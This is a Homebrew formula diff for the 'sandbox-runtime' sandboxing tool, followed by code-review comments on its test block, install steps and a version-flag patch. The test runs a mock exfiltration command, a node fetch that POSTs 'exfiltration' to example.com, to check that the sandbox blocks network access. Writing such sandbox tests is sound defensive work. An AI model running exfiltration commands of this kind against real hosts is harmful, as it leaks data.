Formula/s/sandbox-runtime.rb

```diff
@@ -0,0 +1,21 @@
+class SandboxRuntime < Formula
+  desc "Lightweight sandboxing tool for filesystem and network restrictions"
+  homepage "https://github.com/anthropic-experimental/sandbox-runtime"
+  url "https://registry.npmjs.org/@anthropic-ai/sandbox-runtime/-/sandbox-runtime-0.0.1.tgz"
+  sha256 "3b034b4afdb5d8fbb49d4bb9f7e3924bf8bb77612f9ed098800d157847904150"
+  license "Apache-2.0"
+  head "https://github.com/anthropic-experimental/sandbox-runtime.git", branch: "main"
+
+  depends_on "node"
+
+  def install
+    system "npm", "install", *std_npm_args
+    bin.install_symlink Dir["#{libexec}/bin/*"]
+  end
+
+  test do
+    command = 'node -e \"fetch(\'https://example.com\', { method: \'POST\', body: \'exfiltration\' })\"'
+    output = shell_output("#{bin}/srt \"#{command}\" 2>&1 || true")
+    assert_match "Operation not permitted", output
```

Comment:
```suggestion
    assert_match version.to_s, shell_output("#{bin}/srt --version")
    (testpath/"test.js").write <<~JAVASCRIPT
      fetch('https://example.com', {
        method: 'POST',
        body:   'exfiltration'
      })
    JAVASCRIPT
    assert_match "Operation not permitted", shell_output("#{bin}/srt 'node test.js' 2>&1", <expected exit code>)
```
plus would be nice to apply version fix patch

Reply:
yeah, we should do that

Reply:
Or you can simply use curl instead of node here

Reply:
>     assert_match version.to_s, shell_output("#{bin}/srt --version")

By reintroducing this, we're blocked on https://github.com/anthropic-experimental/sandbox-runtime/pull/12.

Reply:
> There is no expected error code, apart from being non-zero.

The source code uses `1`, just as many other tools do. Use it and remove `|| false` as this is more compact and allows to catch unexpected exit code if the upstream decides to update it for whatever reason

> `curl` would be cleaner, but I used node because it's *explicitly* declared as a dependency. Is that OK?

`srt` already uses Node.js as its runtime. There is no need to check whether the `node` command is available in the `test` block. Just use `curl`

> You mean waiting for https://github.com/anthropic-experimental/sandbox-runtime/pull/12 to be merged before this formula is added, or patching here during installation?

Patch it and wait for the response. Once the upstream merges pull request, we can add the formula without the need to wait for a new tagged release. You can use [`inreplace`](https://docs.brew.sh/rubydoc/Formula.html#inreplace-instance_method) for the patch